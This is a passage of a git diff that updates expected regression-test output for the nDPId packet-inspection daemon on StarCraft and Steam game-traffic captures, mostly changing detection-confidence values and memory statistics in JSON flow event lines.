+00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389967432,"flow_last_seen":1437389968027,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} 00576{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","packets-captured":800,"packets-processed":797,"total-skipped-flows":0,"total-l4-payload-len":316668,"total-not-detected-flows":0,"total-guessed-flows":13,"total-detected-flows":39,"total-detection-updates":12,"total-updates":0,"current-active-flows":0,"total-active-flows":52,"total-idle-flows":52,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":315,"global_ts_msec":1437389985996} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 800/797 @@ -321,9 +321,9 @@ ~~ total active/idle flows...: 52/52 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5973240 bytes -~~ total memory freed........: 5973240 bytes -~~ total allocations/frees...: 119189/119189 +~~ total memory allocated....: 6106874 bytes +~~ total memory freed........: 6106874 bytes +~~ total allocations/frees...: 121951/121951 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 199 chars ~~ json string max len.......: 1155 chars diff --git a/test/results/steam.pcap.out b/test/results/steam.pcap.out index 6c9a0281a..5b001cd18 100644 --- a/test/results/steam.pcap.out +++ b/test/results/steam.pcap.out @@ -2,173 +2,173 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"steam.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1357332164693} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"steam.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164693,"flow_last_seen":1357332164693,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164693,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"steam.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1357332164693,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164693,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx\/AqLyVkkKYDbJhaYoALLORVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"steam.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164693,"flow_last_seen":1357332164693,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164693,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"steam.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164693,"flow_last_seen":1357332164693,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164693,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"steam.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164693,"flow_last_seen":1357332164693,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164693,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"steam.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1357332164693,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164693,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkyDAqLyVkkKYDLJhaYsALLORVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"steam.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164693,"flow_last_seen":1357332164693,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164693,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"steam.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164693,"flow_last_seen":1357332164693,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164693,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"steam.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164694,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"steam.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1357332164694,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164694,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+LvAqLyVUatzCLJhaYoALBkuVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"steam.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164694,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"steam.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164694,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"steam.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164694,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"steam.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1357332164694,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164694,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+L3AqLyVUatzBrJhaYkALBkxVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"steam.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164694,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"steam.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164694,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"steam.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164736,"flow_last_seen":1357332164736,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164736,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"steam.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1357332164736,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164736,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR5qbAqLyVRRyRrLJhaYoALAcZVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"steam.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164736,"flow_last_seen":1357332164736,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164736,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"steam.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164736,"flow_last_seen":1357332164736,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164736,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"steam.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"steam.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1357332164737,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164737,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+LvAqLyVUatzCLJhaYkALBkvVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"steam.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"steam.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"steam.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.36","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"steam.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1357332164737,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164737,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARHb3AqLyVRI5bJLJhaYkALD4wVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"steam.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.36","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"steam.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.36","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"steam.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"steam.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1357332164737,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164737,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkyDAqLyVkkKYDLJhaYoALLOSVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"steam.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"steam.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"steam.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1357332164761,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164761,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWSYAAIARjXhFHJGswKi8lWmKsmEANLLiVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAzAy3GMcAAAA="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"steam.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164786,"flow_last_seen":1357332164786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164786,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"steam.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1357332164786,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164786,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+LzAqLyVUatzB7JhaYoALBkvVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"steam.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164786,"flow_last_seen":1357332164786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164786,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"steam.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164786,"flow_last_seen":1357332164786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164786,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"steam.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.83","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"steam.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1357332164787,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164787,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARQazAqLyV0G+rU7JhaYkALGIfVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"steam.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.83","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"steam.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.83","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"steam.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 